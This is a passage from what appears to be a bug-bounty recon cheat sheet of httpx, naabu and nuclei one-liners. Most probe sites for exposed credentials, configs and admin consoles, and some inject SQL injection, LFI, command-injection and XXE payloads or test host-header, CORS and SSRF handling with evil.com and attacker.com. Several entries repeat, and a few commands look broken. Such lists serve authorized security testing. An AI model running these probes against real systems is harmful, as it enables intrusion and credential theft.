cat urls.txt | qsreplace "' AND SLEEP(5)--" | httpx -silent -rt -o sqli_time_based.txt
Enter fullscreen mode Exit fullscreen mode

Detect exposed Git repositories (.git folder)

cat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o exposed_git_repos.txt
Enter fullscreen mode Exit fullscreen mode

Find Local File Inclusion (LFI)

cat urls.txt | qsreplace '../../../../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_found.txt
Enter fullscreen mode Exit fullscreen mode

Open Directory Listing

cat subdomains.txt | httpx -silent -mc 200 -fr 'Index of' -o open_directory_listing.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Kibana Dashboards (Internal Leaks)

cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover (Check NXDOMAIN)

subfinder -d target.com | httpx -silent -sc -o subs_status.txt
cat subs_status.txt | grep 'NXDOMAIN' > takeover_candidates.txt
Enter fullscreen mode Exit fullscreen mode

Test for Host Header Injection

cat urls.txt | httpx -silent -H "Host: evil.com" -fr 'evil.com' -o host_header_injection.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Config Files

cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.php\n/settings.py\n/.env\n/config.json') -mc 200 -o exposed_configs.txt
Enter fullscreen mode Exit fullscreen mode

Detecting Exposed Admin Panels

cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/wp-admin\n/console\n/dashboard') -mc 200 -o admin_panels.txt
Enter fullscreen mode Exit fullscreen mode

Command Injection Test

cat urls.txt | qsreplace '$(id)' | httpx -silent -fr 'uid=' -o command_injection.txt
Enter fullscreen mode Exit fullscreen mode

Check for Backup Files (Old Configs)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/db_backup.sql\n/config.old') -mc 200 -o backup_files_found.txt
Enter fullscreen mode Exit fullscreen mode

Check for Open Redis Instances

cat subdomains.txt | httpx -silent -path / -p 6379 -o open_redis_instances.txt
Enter fullscreen mode Exit fullscreen mode

Test for Open Proxy Misconfiguration

curl -x http://target.com http://example.com -v
Enter fullscreen mode Exit fullscreen mode

XXE Injection Test

cat urls.txt | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>' | httpx -silent -fr 'root:x:' -o xxe_found.txt
Enter fullscreen mode Exit fullscreen mode

Detect JWT Tokens in Response

cat urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Server Version Disclosure (Fingerprinting)

cat subdomains.txt | httpx -silent -server -o server_versions.txt
Enter fullscreen mode Exit fullscreen mode

Test PUT Method for File Upload

cat subdomains.txt | httpx -silent -method PUT -path '/test.txt' -body 'test upload' -mc 201,200 -o put_upload_possible.txt
Enter fullscreen mode Exit fullscreen mode

Check for Debug Endpoints

cat subdomains.txt | httpx -silent -path /debug -mc 200 -o debug_endpoints.txt
Enter fullscreen mode Exit fullscreen mode

Find Content Security Policy Bypass (Open Wildcards)

cat subdomains.txt | httpx -silent -hx | grep 'Content-Security-Policy' | grep '*'
Enter fullscreen mode Exit fullscreen mode

Check for Public .DS_Store Files (Directory Listing)

cat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Jenkins Panels

cat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt
Enter fullscreen mode Exit fullscreen mode

Detect Internal IP Leaks in Response

cat urls.txt | httpx -silent -fr '10.' -o internal_ip_leak.txt
Enter fullscreen mode Exit fullscreen mode

Search for Open API Documentation (Swagger)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/swagger-ui.html\n/api-docs\n/openapi.json') -mc 200 -o open_api_docs.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed .env Files (Sensitive Configs)

cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed MySQL Dumps

cat subdomains.txt | httpx -silent -path /db.sql -mc 200 -o mysql_dumps.txt
Enter fullscreen mode Exit fullscreen mode

Check for Misconfigured CORS (Allow-All)

cat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Adminer (DB Management Interface)

cat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o exposed_adminer.txt
Enter fullscreen mode Exit fullscreen mode

Search for Exposed Backup Files (.bak)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/index.php.bak\n/config.bak\n/db.bak') -mc 200 -o backup_files.txt
Enter fullscreen mode Exit fullscreen mode

Search for Test/Dev Subdomains (Staging)

subfinder -d target.com | grep -Ei 'dev|test|staging|qa' > staging_subdomains.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open RDP Servers (Network Exposures)

cat ips.txt | naabu -p 3389 -silent -o open_rdp.txt
Enter fullscreen mode Exit fullscreen mode

Detect AWS S3 Buckets via Subdomains

cat subdomains.txt | grep -E 's3.amazonaws.com|amazonaws' > s3_buckets.txt
Enter fullscreen mode Exit fullscreen mode

Identify Weak Security Headers (Lack of CSP, HSTS)

cat urls.txt | httpx -silent -hx | grep -v -E 'Strict-Transport-Security|Content-Security-Policy' > weak_headers.txt
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Docker API

cat ips.txt | naabu -p 2375 -silent -o open_docker_api.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Grafana Dashboards

cat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt
Enter fullscreen mode Exit fullscreen mode

Check for Public PHP Info Pages (Leaking Config)

cat urls.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Laravel Debug Panels

cat subdomains.txt | httpx -silent -path /_debugbar -mc 200 -o laravel_debug.txt
Enter fullscreen mode Exit fullscreen mode

Look for Open ElasticSearch (Data Exposure)

cat ips.txt | naabu -p 9200 -silent -o open_elasticsearch.txt
Enter fullscreen mode Exit fullscreen mode

Identify Directory Traversal (Simple Payload)

cat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o directory_traversal.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Kibana Dashboards (Sensitive Logs)

cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Wordpress Debug Logs

cat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_logs.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed FTP Servers (Anonymous Access)

cat ips.txt | naabu -p 21 -silent -o open_ftp.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open MongoDB Databases (No Auth)

cat ips.txt | naabu -p 27017 -silent -o open_mongo.txt
Enter fullscreen mode Exit fullscreen mode

Identify Open PhpMyAdmin Panels

cat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o open_phpmyadmin.txt
Enter fullscreen mode Exit fullscreen mode

Search for Backup Files with Extensions (.bak, .old)

cat subdomains.txt | gauplus | grep -E '\.bak|\.old|\.backup' > backup_files_found.txt
Enter fullscreen mode Exit fullscreen mode

Check for Open Directories (Index of Listings)

cat subdomains.txt | httpx -silent -mc 200 -fr 'Index of /' -o open_directories.txt
Enter fullscreen mode Exit fullscreen mode

Find Public GraphQL Endpoints (API Leaks)

cat subdomains.txt | httpx -silent -path /graphql -mc 200 -o open_graphql.txt
Enter fullscreen mode Exit fullscreen mode

Identify Misconfigured AWS Bucket via Headers

cat urls.txt | httpx -silent -hx | grep -i 'x-amz' > aws_bucket_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Check for Publicly Accessible Jenkins Script Console

cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt
Enter fullscreen mode Exit fullscreen mode

Check for Exposed SVN Files

cat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Find Publicly Exposed Config.json Files

cat subdomains.txt | httpx -silent -path /config.json -mc 200 -o config_json_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Identify Unauthenticated Redis Servers

cat ips.txt | naabu -p 6379 -silent -o open_redis.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Private Keys in URLs

cat urls.txt | grep -Ei 'private_key|id_rsa|pem' > private_key_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Search for Open API Keys in URLs

cat urls.txt | grep -Ei 'apikey|api_key|token' > exposed_api_keys.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed .bash_history Files

cat subdomains.txt | httpx -silent -path /.bash_history -mc 200 -o bash_history_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Check for Open etc/passwd via LFI

cat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_passwd.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Exposed Backup ZIP Files

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/site_backup.zip\n/db_backup.zip') -mc 200 -o backup_zip_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Logs (server.log, error.log)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/server.log\n/error.log\n/application.log') -mc 200 -o exposed_logs.txt
Enter fullscreen mode Exit fullscreen mode

Find Publicly Accessible Admin Panels (General)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/administrator\n/admin/login\n/admin.php\n/adminer.php') -mc 200 -o open_admin_panels.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed YAML Config Files

cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.yaml\n/application.yaml') -mc 200 -o exposed_yaml.txt
Enter fullscreen mode Exit fullscreen mode

Check for Directory Traversal to Windows Files

cat urls.txt | qsreplace 'C:\Windows\win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_lfi.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Jupyter Notebooks (No Auth)

cat subdomains.txt | httpx -silent -path /tree -mc 200 -o open_jupyter.txt
Enter fullscreen mode Exit fullscreen mode

Identify Server Error Pages (500 Errors)

cat urls.txt | httpx -silent -mc 500 -o server_errors.txt
Enter fullscreen mode Exit fullscreen mode

Check for Open SNMP Services

cat ips.txt | naabu -p 161 -silent -o open_snmp.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Laravel Environment Files (.env)

cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt
Enter fullscreen mode Exit fullscreen mode

Detect Git Repository Exposures (.git/config)

cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_configs.txt
Enter fullscreen mode Exit fullscreen mode

Look for Exposed Dockerfiles

cat subdomains.txt | httpx -silent -path /Dockerfile -mc 200 -o exposed_dockerfiles.txt
Enter fullscreen mode Exit fullscreen mode

Identify Publicly Accessible AWS Credentials

cat subdomains.txt | httpx -silent -path /aws/credentials -mc 200 -o exposed_aws_credentials.txt
Enter fullscreen mode Exit fullscreen mode

Search for Backup Database Dumps (SQL, SQLite)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/db.sql\n/database.sql\n/dump.sql\n/backup.db') -mc 200 -o db_dumps.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed SSL Certificates (pem)

cat subdomains.txt | httpx -silent -path /ssl/cert.pem -mc 200 -o exposed_ssl.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Configuration.php Files (Joomla)

cat subdomains.txt | httpx -silent -path /configuration.php -mc 200 -o joomla_config_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Hunt for Open Jenkins Dashboards

cat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Magento Admin Panels

cat subdomains.txt | httpx -silent -path /admin -mc 200 -o magento_admin.txt
Enter fullscreen mode Exit fullscreen mode

Check for Exposed API Documentation (Swagger UI)

cat subdomains.txt | httpx -silent -path /swagger-ui.html -mc 200 -o swagger_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect GitLab or GitHub Enterprise Instances

cat subdomains.txt | httpx -silent -path /users/sign_in -mc 200 -o gitlab_or_ghe.txt
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured CORS (Wildcard)

cat urls.txt | httpx -silent -H "Origin: https://evil.com" -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Server Status Pages (Apache/Nginx)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/server-status\n/nginx_status') -mc 200 -o server_status_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Identify Exposed Debug Pages (PHP Info)

cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Redis Stats Pages (Unprotected UI)

cat subdomains.txt | httpx -silent -path /redis -mc 200 -o redis_ui_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Kubernetes Dashboard

cat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Look for GraphQL Playground

cat subdomains.txt | httpx -silent -path /playground -mc 200 -o graphql_playground_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed OpenAPI Spec Files (openapi.json)

cat subdomains.txt | httpx -silent -path /openapi.json -mc 200 -o openapi_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed GCP Metadata Servers

cat ips.txt | naabu -p 80,443 -silent | httpx -path /computeMetadata/v1/ -H 'Metadata-Flavor: Google' -mc 200 -o gcp_metadata_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Jenkins Console Logs

cat subdomains.txt | httpx -silent -path /console -mc 200 -o jenkins_console_logs.txt
Enter fullscreen mode Exit fullscreen mode

Check for Open Jira Dashboards (Exposed Tickets)

cat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Env Variables via /env (SpringBoot)

cat subdomains.txt | httpx -silent -path /env -mc 200 -o springboot_env_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured GitHub Actions Workflows (YAML)

cat subdomains.txt | gauplus | grep -Ei '.github/workflows/.*\.yml' > github_workflows_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Default Admin Credentials on Login Pages

cat urls.txt | nuclei -t cves/ -tags 'default-login' -o default_creds.txt
Enter fullscreen mode Exit fullscreen mode

Check for Misconfigured Prometheus Servers

cat subdomains.txt | httpx -silent -path /graph -mc 200 -o prometheus_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Backup Files (ZIP, TAR, SQL)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/backup.tar.gz\n/dump.sql') -mc 200 -o exposed_backups.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Open Directory Listings

cat subdomains.txt | httpx -silent -fr '<title>Index of /' -o open_directories.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Jenkins Script Console (RCE Point)

cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Kubernetes Kubelet APIs (Unauth Access)

cat ips.txt | httpx -silent -path /pods -mc 200 -o kubelet_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Look for Apache Struts Vulnerable Endpoints

cat subdomains.txt | httpx -silent -path /struts2-showcase/index.action -mc 200 -o struts_vuln.txt
Enter fullscreen mode Exit fullscreen mode

Identify Open Tomcat Manager Consoles

cat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_manager_open.txt
Enter fullscreen mode Exit fullscreen mode

Detect CVE-2021-3129 (Laravel Debug Mode RCE)

cat subdomains.txt | httpx -silent -path /_ignition/execute-solution -mc 200 -o laravel_rce.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Config.json / settings.json

cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.json\n/settings.json') -mc 200 -o exposed_json_configs.txt
Enter fullscreen mode Exit fullscreen mode

Check for Outdated WordPress (Version Leak)

cat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_version.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Log Files (.log)

cat subdomains.txt | httpx -silent -path /error.log -mc 200 -o exposed_logs.txt
Enter fullscreen mode Exit fullscreen mode

Detect Misconfigured GraphQL Endpoints (Introspection Enabled)

cat subdomains.txt | httpx -silent -path /graphql -H 'Content-Type: application/json' -d '{"query":"query IntrospectionQuery {__schema { queryType { name }}}"}' -o graphql_introspection_enabled.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Config.php in WordPress / Joomla

cat subdomains.txt | httpx -silent -path /wp-config.php -mc 200 -o wp_config_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open API Endpoints (via common paths)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/api/v1/\n/api/\n/api/v2/\n/app_dev.php/api/') -mc 200 -o open_api_endpoints.txt
Enter fullscreen mode Exit fullscreen mode

Check for Exposed GitHub Personal Access Tokens (PATs)

cat subdomains.txt | gauplus | grep -E 'token=[a-z0-9]+' > github_tokens_leak.txt
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured AWS Buckets (S3)

cat subdomains.txt | httpx -silent -path / -mc 200 -o s3_buckets_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Laravel Log Files

cat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o laravel_log_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Check for Outdated Apache Version via Server Header

cat subdomains.txt | httpx -silent -fr 'Server: Apache/2.4' -o outdated_apache.txt
Enter fullscreen mode Exit fullscreen mode

Detect PHPMyAdmin Open Login Pages

cat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_open.txt
Enter fullscreen mode Exit fullscreen mode

Look for Unprotected Kibana Instances

cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_open.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Public Grafana Dashboards

cat subdomains.txt | httpx -silent -path /login -mc 200 -o grafana_login_open.txt
Enter fullscreen mode Exit fullscreen mode

Search for Common Backup Extensions (bak, old, save)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/index.php.bak\n/config.old\n/config.save') -mc 200 -o backup_files_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured ElasticSearch Instances (Public Index)

cat ips.txt | httpx -silent -path /_cat/indices?v -mc 200 -o elasticsearch_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Look for Exposed Jenkins Build Logs

cat subdomains.txt | httpx -silent -path /job/test/lastBuild/consoleText -mc 200 -o jenkins_build_logs.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Adminer DB Management Tools

cat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed SVN Directories

cat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed .git Repos (Source Code Leak)

cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Sensitive Files using common patterns (env, db creds, ssh keys)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/.env\n/database.yml\n/id_rsa\n/config.php\n/secrets.yml') -mc 200 -o sensitive_files.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Docker and Kubernetes Dashboard

cat subdomains.txt | httpx -silent -path-list <(echo -e '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy\n/docker') -mc 200 -o kube_docker_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Environment Variables in Responses

cat subdomains.txt | httpx -silent -fr 'AWS_ACCESS_KEY_ID|SECRET_KEY|DB_PASSWORD' -o secrets_in_response.txt
Enter fullscreen mode Exit fullscreen mode

Find Public Swagger API Documentation (API Discovery)

cat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Server-Status Pages (Apache/Nginx Debug Info)

cat subdomains.txt | httpx -silent -path /server-status -mc 200 -o server_status_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Open Redis, Memcached, MongoDB Ports (Unauth Access)

naabu -list subdomains.txt -ports 6379,11211,27017 -silent -o open_db_ports.txt
Enter fullscreen mode Exit fullscreen mode

Identify Publicly Accessible .DS_Store (File Disclosure)

cat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Wordpress Debug Log (Sensitive Info)

cat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_log.txt
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Internal IP in Responses (SSR Leak)

cat subdomains.txt | httpx -silent -fr '10\.|192\.168\.|172\.' -o internal_ip_leak.txt
Enter fullscreen mode Exit fullscreen mode

Find Laravel Env Leak via Incorrect Env Handler

cat subdomains.txt | httpx -silent -path /.env -mc 200 -o laravel_env_leak.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Backup Folders

cat subdomains.txt | httpx -silent -path /backup -mc 200 -o backup_folder_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Look for Open Joomla Installers

cat subdomains.txt | httpx -silent -path /installation/index.php -mc 200 -o joomla_installer.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Debug Pages (debug=true)

cat subdomains.txt | httpx -silent -fr 'debug=true' -o debug_pages.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Jira Dashboards

cat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_open.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Backup Files (config.old, index.bak)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/config.old\n/index.bak\n/wp-config.php.save') -mc 200 -o backup_leaks.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Admin Portals (Common Paths)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/login\n/dashboard\n/console') -mc 200 -o open_admin_portals.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Debug Toolbar (Django Debug)

cat subdomains.txt | httpx -silent -path /__debug__/ -mc 200 -o django_debug_toolbar.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Directories with Readable Files

cat subdomains.txt | httpx -silent -fr '<title>Index of /' -o open_directory_listing.txt
Enter fullscreen mode Exit fullscreen mode

Identify Exposed Proxy Logs (Squid / HAProxy)

cat subdomains.txt | httpx -silent -path /var/log/squid/access.log -mc 200 -o proxy_logs_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Check for Public WebSockets Endpoints (Leaky API)

cat subdomains.txt | httpx -silent -path /socket.io -mc 200 -o websocket_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Public GraphQL Consoles (Interactive API)

cat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphiql_open.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Open Hadoop Resource Manager

cat subdomains.txt | httpx -silent -path /ws/v1/cluster/info -mc 200 -o hadoop_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed PHPInfo Pages (Info Disclosure)

cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Publicly Accessible Wordpress XMLRPC (Brute Force Possible)

cat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_open.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open ElasticSearch Instances (Data Exposure)

naabu -list subdomains.txt -p 9200 -silent | httpx -silent -path /_cat/indices?v -mc 200 -o open_elasticsearch.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Open Kubernetes Config (Cluster Info Leak)

cat subdomains.txt | httpx -silent -path /.kube/config -mc 200 -o kube_config_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find GraphQL Endpoints with Introspection Enabled

cat subdomains.txt | httpx -silent -path /graphql -mc 200 -fr 'Introspection' -o graphql_introspection.txt
Enter fullscreen mode Exit fullscreen mode

Detect Misconfigured CORS (Allow-Origin: )

cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr 'Access-Control-Allow-Origin: \*' -o cors_misconfig.txt
Enter fullscreen mode Exit fullscreen mode

Look for Exposed Adminer (DB Management Tool)

cat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Redis Commander UI (Unauth Control)

cat subdomains.txt | httpx -silent -path /redis/ -mc 200 -o redis_ui_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Public GitLab CI/CD Config (Pipeline Disclosure)

cat subdomains.txt | httpx -silent -path /.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Open Debug Mode in Flask Apps

cat subdomains.txt | httpx -silent -path /console -mc 200 -o flask_debug_console.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Exim/Webmin Panels

cat subdomains.txt | httpx -silent -path-list <(echo -e '/exim\n/webmin') -mc 200 -o open_exim_webmin.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Laravel Log Files (App Key Disclosure)

cat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o laravel_logs_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Public AWS Config Files (Credentials Leak)

cat subdomains.txt | httpx -silent -path /.aws/credentials -mc 200 -o aws_creds_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Identify Open Favicon Files and Fingerprint Services

cat subdomains.txt | httpx -silent -path /favicon.ico -o favicons/ && for icon in favicons/*; do shasum -a 256 $icon; done
Enter fullscreen mode Exit fullscreen mode

Check for Exposed GitHub Workflow Files (.github/workflows)

cat subdomains.txt | httpx -silent -path /.github/workflows/ -mc 200 -o github_workflows_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Jenkins Consoles with Anon Access

cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_console.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Default Tomcat Admin Panels

cat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_admin_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Look for Public Backup Files (tar/zip dumps)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/backup.tar.gz\n/db.sql') -mc 200 -o exposed_backups.txt
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Laravel Telescope Panels

cat subdomains.txt | httpx -silent -path /telescope -mc 200 -o laravel_telescope.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed VNC/TeamViewer/Web RDP

naabu -list subdomains.txt -p 5900,3389 -silent -o remote_access_ports.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Grafana Panels (Unauth Access)

cat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Misconfigured API Endpoints

cat subdomains.txt | nuclei -t misconfiguration/api-misconfiguration.yaml -o api_misconfigs.txt
Enter fullscreen mode Exit fullscreen mode

Identify Exposed Internal DNS Resolvers

cat subdomains.txt | dnsx -a -resp-only -silent | grep -E '10\.|192\.168\.|172\.' -o internal_dns.txt
Enter fullscreen mode Exit fullscreen mode

Detect Anonymous FTP Access (File Exposure)

nmap -p 21 --script ftp-anon -iL subdomains.txt -oN ftp_anon_scan.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Configuration Pages (config.php)

cat subdomains.txt | httpx -silent -path /config.php -mc 200 -o config_php_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Identify Publicly Available Magento Admin Panels

cat subdomains.txt | httpx -silent -path /admin -mc 200 -fr 'Magento' -o magento_admin_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Check for SSRF by Detecting Response Based Redirects

cat subdomains.txt | httpx -silent -H "X-Forwarded-For: attacker.com" -fr 'Location: attacker.com' -o ssrf_possible.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Env Files (.env with Secrets)

cat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt
Enter fullscreen mode Exit fullscreen mode

Find XMLRPC Enabled on WordPress (Brute Force Vector)

cat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o wordpress_xmlrpc.txt
Enter fullscreen mode Exit fullscreen mode

Identify Open Kibana Dashboards (Sensitive Logs)

cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt
Enter fullscreen mode Exit fullscreen mode

Find Servers Exposing phpinfo() (Sensitive Config)

cat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Publicly Accessible Swagger APIs

cat subdomains.txt | httpx -silent -path /swagger-ui/ -mc 200 -o swagger_exposed.txt
Enter fullscreen mode Exit fullscreen mode

